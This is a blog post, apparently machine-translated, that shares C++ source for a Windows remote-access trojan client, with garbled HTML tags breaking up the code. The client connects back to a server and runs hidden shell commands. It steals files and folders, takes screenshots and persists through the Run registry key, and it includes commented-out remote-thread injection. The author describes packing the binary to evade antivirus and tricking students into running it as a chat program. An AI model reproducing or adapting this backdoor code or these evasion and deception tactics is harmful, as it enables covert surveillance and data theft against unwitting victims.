Remote control program written by VC

I have been learning VC for a while, but I have never used VC to write a remote control program. It was a little more difficult at the beginning. Recently I feel I can try it, so after writing it, I feel that I have learned a lot, especially for network programming.

The following is the source code of the client of my program. I am going to share it with you.

// Controlclient. CPP: defines the entry point for the console application. <br/> // </P> <p> # include "stdafx. H "<br/> typedef struct {<br/> DWORD wait; <br/> DWORD open; <br/> DWORD exec; <br/> dword pid; <br/> handle h; <br/> char path [255]; <br/>}info; <br/> typedef handle (_ stdcall * OpenProcess) (DWORD, bool, DWORD); <br/> typedef DWORD (_ stdcall * waitforsingleobject) (handle, DWORD); <br/> typedef uint (_ stdca Ll * winexec) (lpcstr, uint); <br/> handle XR; <br/> handle MH; <br/> char screenpath [200] = {0 }; <br/> DWORD winapi T (lpvoid p) {<br/> info * P1 = (Info *) P; <br/> winexec W = (winexec) p1-> exec; <br/> OpenProcess o = (OpenProcess) P1-> open; <br/> waitforsingleobject wait = (waitforsingleobject) P1-> wait; </P> <p> P1-> H = O (process_all_access, false, P1-> PID); <br/> // while (1) {<br/> wait (P1-> H, infinite); <br/> W (P1-> path, 1); <br/ >//}< Br/> // messageboxa (0, P1-> A, P1-> A, 0); <br/> // while (1 ); <br/> return 0; <br/>}< br/> DWORD getpid (char * P) {<br/> processentry32 p32; <br/> p32.dwsize = sizeof (p32); <br/> handle HPS =: createconlhelp32snapshot (th32cs_snapprocess, 0); <br/>: process32first (HPS, & p32); <br/> do {<br/> If (: stricmp (p32.szexefile, P) = 0) {<br/> //:: messageBox (0, "1", "1", 0); <br/>: closehandle (HPS); <br/> return p32.th32p Rocessid; <br/>}< br/>} while (: process32next (HPS, & p32); <br/> return 0; <br/>}< br/> void inject () {<br/> int pid = getpid ("assumer.exe"); <br/> handle pH = :: openProcess (process_all_access, false, pid); <br/> void * s; <br/> S =: virtualallocex (pH, * 4, mem_commit, page_execute_readwrite ); <br/>: writeprocessmemory (pH, S, T, 1024 *); <br/> info I; <br/> zeromemory (& I, sizeof (I); <br/> char path [255] = {0}; <br /> Getmodulefilename (0, path, 255); <br/> strcpy (I. path, PATH); <br/> hmodulem =: loadlibrary ("kernel32.dll"); <br/> I. wait = (DWORD): getprocaddress (M, "waitforsingleobject"); <br/> I .exe c = (DWORD) getprocaddress (M, "winexec "); <br/> I. open = (DWORD) getprocaddress (M, "OpenProcess"); <br/> I. PID = getcurrentprocessid (); <br/> info * S1; <br/> S1 = (Info *): virtualallocex (pH, 0, sizeof (Info), mem_commit, page_readwrite); <br/ >:: Writeprocessmemory (pH, S1, & I, sizeof (Info), 0); <br/> DWORD tid; <br/> RTL =: createremotethread (pH, 0, 0, (lpthread_start_routine) s, S1, 0, & tid); <br/>}< br/> void enabledebugpriv () // upgrade the process to debug permission <br/>{< br/> handle htoken; <br/> token_privileges TP; <br/> luid; <br/> // open the process Token Ring <br/> openprocesstoken (getcurrentprocess (), <br/> token_adjust_privileges | token_query, <br/> & htoken ); <br/> // obtain the local unique ID of the Process <br/> look Upprivilegevalue (null, se_debug_name, & luid); <br/> TP. privilegecount = 1; <br/> TP. privileges [0]. attributes = se_privilege_enabled; <br/> TP. privileges [0]. luid = luid; <br/> // adjust process permissions <br/> adjusttokenprivileges (htoken, 0, & TP, sizeof (token_privileges), null, null ); <br/>}< br/> int getclsid (const wchar * format, CLSID * pclsid) <br/>{< br/> uint num = 0; // Number of image encoders <br/> uint size = 0; // SIZE OF THE I Mage encoder array in bytes </P> <p> imagecodecinfo * pimagecodecinfo = NULL; </P> <p> getimageencoderssize (& num, & size ); <br/> If (size = 0) <br/> return-1; // failure </P> <p> pimagecodecinfo = (imagecodecinfo *) (malloc (size); <br/> If (pimagecodecinfo = NULL) <br/> return-1; // failure </P> <p> getimageencoders (Num, size, pimagecodecinfo); </P> <p> for (uint J = 0; j <num; ++ J) <br/>{< br/> If (wcscmp (pimagecodec Info [J]. mimetype, format) = 0) <br/>{< br/> * pclsid = pimagecodecinfo [J]. CLSID; <br/> return J; // success <br/>}< br/>}// for </P> <p> return-1; // failure <br/>}< br/> queue <string> V; <br/> int foldersize = 0; <br/> void folderinit (string S) {<br/> win32_find_data D; <br/> handle H = findfirstfile (S + "//*. *"). data (), & D); <br/> do {<br/> If (stricmp (D. cfilename ,". ") = 0 | stricmp (D. cfilename ,".. ") = 0) {<br/> Continue; <br/>}< br/> If (D. dwfileattributes & file_attribute_directory) {<br/> v. push (S + "//" + D. cfilename + "1"); <br/> folderinit (S + "//" + D. cfilename); <br/>}else {<br/> v. push (S + "//" + D. cfilename + "0"); <br/> foldersize + = (D. nfilesizehigh * (maxdword + 1) + d. nfilesizelow); <br/>}< br/>}while (findnextfile (H, & D); <br/> findclose (h ); <br/>}< br/> int main (INT argc, char * argv []) <br/>{</P> <p> // enabledebuupli V (); <br/> // inject (); <br/> MH =: createmutex (null, false, "sxsxsx1 "); <br/> If (getlasterror () = error_already_exists) <br/>{< br/> return 0; <br/>}</P> <p> ulong_ptr m_gdiplustoken; <br/> gdiplus: gdiplusstartupinput; <br/> gdiplus: gdiplusstartup (& m_gdiplustoken, & gdiplusstartupinput, null); <br/> wsadata data; <br/> word VV = makeword (); <br/> wsastartup (VV, & data); <br/> mysocket MS; <br /> MS. init (); </P> <p> char CP [255] = {0}; <br/> getmodulefilename (0, CP, 255 ); <br/> file * cf = fopen (CP, "rb"); <br/> fseek (CF, 0-sizeof (INI), seek_end ); </P> <p> ini ci; <br/> fread (& CI, sizeof (CI), 1, CF); <br/> fclose (CF ); <br/> char * desip = 0; <br/> If (CI. flag = 1) {<br/> desip = CI. text; <br/>}else {<br/> desip = Ms. gethostbyname (CI. text); <br/>}</P> <p> getwindowsdirectory (screenpath, 200); <br/> strcat (screenpath, "// bilblt "); <Br/> con: While (Ms. connect (desip, 2000) {<br/> sleep (1000); <br/>}< br/> while (1) {<br/> MSG m; <br/> int r = Ms. recv (char *) & M, sizeof (M), 1); <br/> If (r =-1 | r = 0) {<br/> MS. close (); <br/> MS. init (); <br/> goto con; <br/>}< br/> If (stricmp (M. flag, "command") = 0) {<br/> char cmd [200] = {0}; <br/> getsystemdirectory (CMD, sizeof (CMD )); <br/> strcat (CMD, "// cmd.exe/C"); <br/> strcat (CMD, M. command); <br/> security_attr Ibutes SA; <br/> SA. nlength = sizeof (security_attributes); <br/> SA. binherithandle = true; </P> <p> SA. lpsecuritydescriptor = 0; <br/> handle P, P1; <br/> createpipe (& P, & P1, & SA, 0); <br/> startupinfo start; <br/> Start. CB = sizeof (startupinfo); <br/> getstartupinfo (& START); <br/> Start. hstderror = p1; <br/> Start. hstdoutput = p1; <br/> Start. wshowwindow = sw_hide; </P> <p> Start. dwflags = startf_useshowwindow | startf_usestdhandle S; <br/> process_information PI; </P> <p> CreateProcess (0, CMD, 0, 0, true, 0, 0, & START, & PI ); <br/> // waitforsingleobject (Pi. hprocess,-1); </P> <p> closehandle (P1); <br/> Char out [1024] = {0}; <br/> while (1) {<br/> dword n; <br/> readfile (p, out, 1023, & N, 0); <br/> If (n> 0) {<br/> MS. send (Out, 1024); <br/> memset (void *) Out ); </P> <p >}else {<br/> * out = 0; <br/> MS. send (Out, 1024); <br/> break; <br/>}</P> <p> close Handle (p); </P> <p>} else if (stricmp (M. flag, "down") = 0) {<br/> downpic: file * F; <br/> F = fopen (M. command, "rb"); <br/> If (f) {<br/> fseek (F, 0, seek_end ); <br/> int L = ftell (f); <br/> fseek (F, 0, seek_set); <br/> If (L> 0) {<br/> MS. send (char *) & L, sizeof (INT); <br/> char B [1024] = {0}; <br/> int n = fread (B, 1, 1024, f); <br/> while (n) {<br/> MS. send (B, n); <br/> N = fread (B, f); <br/>}< br/>} else {<br/> MS. send (char *) & L, Si Zeof (INT); <br/>}< br/>}else {<br/> int L = 0; <br/> MS. send (char *) & L, sizeof (INT); <br/>}< br/> fclose (f); <br/> If (stricmp (M. command, screenpath) = 0) {<br/> unlink (screenpath); <br/>}< br/>} else if (stricmp (M. flag, "up") = 0) {<br/> file * f = fopen (M. command, "WB"); <br/> int L = m. num; <br/> int I = 0; <br/> while (I <L) {<br/> MSG m; <br/> MS. recv (char *) & M, sizeof (m); <br/> fwrite (M. command, 1, M. num, f); <br/> I + = m. num; <Br/> MS. send (char *) & I, sizeof (INT); </P> <p >}< br/> fclose (f ); <br/>} else if (stricmp (M. flag, "screen") = 0) {<br/> int W = getsystemmetrics (sm_cxscreen); <br/> int H = getsystemmetrics (sm_cyscreen ); <br/> HDC Dc = getdc (0); <br/> HDC DC1 = createcompatibledc (DC); <br/> hbitmap B = createcompatiblebitmap (DC, W, H ); <br/> hbitmap old = (hbitmap) SelectObject (DC1, B); <br/> bitblt (DC1, W, H, DC, srccopy | 0x40000000); <br/> SelectObject (DC1, old); <br/> deletedc (DC); <br/> image * I; <br/> I = bitmap: fromhbitmap (hbitmap) b, 0); <br/> CLSID gifcodec; <br/> getclsid (L "image/JPEG", & gifcodec); <br/> int Len = multibytetowidechar (cp_acp, 0, screenpath, strlen (screenpath), 0, 0); <br/> wchar_t * WL = new wchar_t [Len + 1]; <br/>: multibytetowidechar (cp_acp, null, screenpath, strlen (screenpath), wl, Len); <br/> WL [Len] = 0; <br/> I-> Save (WL, & gifcode C, 0); <br/> Delete [] Wl; <br/> Delete I; <br/> deletedc (DC1); <br/> deleteobject (B ); <br/> strcpy (M. flag, "down"); <br/> strcpy (M. command, screenpath); <br/> goto downpic; <br/>} else if (stricmp (M. flag, "close") = 0) {<br/> terminatethread (HDR, 0); <br/> closehandle (HDR); <br/> cout <1; <br/> MS. send (char *) & M, sizeof (m); <br/> cout <2; <br/> MS. close (); <br/> cout <3; <br/> closehandle (MH); <br/> wsacleanup (); <br/> G Diplusshutdown (m_gdiplustoken); <br/> exitprocess (0); <br/>} else if (stricmp (M. flag, "folder") = 0) {<br/> foldersize = 0; <br/> while (! V. empty () {<br/> v. pop (); <br/>}< br/> v. push (string (M. command) + "1"); <br/> folderinit (M. command); <br/> MS. send (char *) & foldersize, sizeof (INT), 1); <br/> while (! V. empty () {<br/> string S = v. front (); <br/> v. pop (); <br/> folder ff; <br/> string ty = S. substr (S. length ()-1, 1); <br/> If (TY = "0") {<br/> ff. type = 0; <br/> strcpy (FF. name, (S. substr (0, S. length ()-2 )). data (); <br/> file * F; <br/> F = fopen (FF. name, "rb"); <br/> If (f) {<br/> fseek (F, 0, seek_end ); <br/> int L = ftell (f); <br/> fseek (F, 0, seek_set); <br/> If (L> 0) {<br/> ff. size = L; <br/> MS. send (char *) & ff, sizeof (ff), 1); <br/> char B [1, 1024] = {0 }; <br/> int n = fread (B, 1,1024, f); <br/> while (n) {<br/> MS. send (B, n, 1); <br/> N = fread (B, 1,1024, F ); <br/>}< br/>}else {<br/> continue; <br/>}< br/>} else {<br/> continue; <br/>}< br/> fclose (f); <br/>}else {<br/> ff. type = 1; <br/> strcpy (FF. name, (S. substr (0, S. length ()-2 )). data (); <br/> MS. send (char *) & ff, sizeof (ff), 1); <br/>}</P> <p >}< br/> folder ff; <br/> ff. type = 2; <br/> MS. send (char *) & ff, sizeof (ff), 1); <br/>}else if (stricmp (M. flag, "Startup") = 0) {</P> <p> hkey; <br/> char lprun [100] = {0 }; <br/> strcpy (lprun, "software // Microsoft // W"); <br/> strcat (lprun, "indows // CurrentVersion // R "); <br/> strcat (lprun, "UN"); <br/> long LRET = regopenkeyex (HKEY_LOCAL_MACHINE, lprun, 0, key_all_access, & hkey ); <br/> If (LRET = error_success) <br/>{< br/> char pfilename [max_path] = {0 }; <br/> DWORD dwret = getmodulefilename (null, pfilename, max_path); <br/> LRET = regsetvalueex (hkey, "myclient", 0, REG_SZ, (byte *) pfilename, dwret); <br/> regclosekey (hkey); <br/>}</P> <p> MS. send (char *) & M, sizeof (M), 1); <br/>}</P> <p> return 0; <br/>}

I was prepared to use the remote thread injection technology to protect the program, but test 360 will report a virus, so this function is commented out. The server function can execute commands on the remote computer, download and upload files and folders, and screen monitoring (this is a constant, images are stored in JPG format, the test found that the transmission rate is not flattering, it is estimated that the image compression rate is not enough, alas, I have read the source code of other professional screen monitoring programs ). The client can connect to the server in two ways: IP address and domain name, and the server is shelled with ASPack. Otherwise, 360 will report a virus. It seems that Kingsoft guard still cannot survive. Alas, no way, it was found that the program was slow after shelling, and the echo of commands had to wait for half a day.

The complete code will be uploaded to my csdn for download as soon as possible. If you are interested, you can check it. The Code has been tested many times and there should be no major problems, I don't want to update it, nor do I want to make it as a gray pigeon. Besides, my level is not enough.

I hope you can correct the shortcomings in this article.

PS: Speaking of code testing, it is okay to test on the local machine. The key lies in the testing on the Wide Area Network. There will be a lot of trouble. I don't have to do that for two machines, so I lied to my students that the chat program told them to run the program. Some of them couldn't bear to cheat me. As a result, many of their computers reported viruses and offended many people. Alas, now I think it's enough to write a program. It's just for the sake of improving our technology. If I do a test, I don't want to look at people's privacy. The more I know, the larger the gap between the ideal and the reality, in the end, I feel like myself. I would like to apologize to my offended friends, and please forgive me. If you don't talk about it, you have to vomit again.

Hard work, hard work, self-confidence, self-improvement!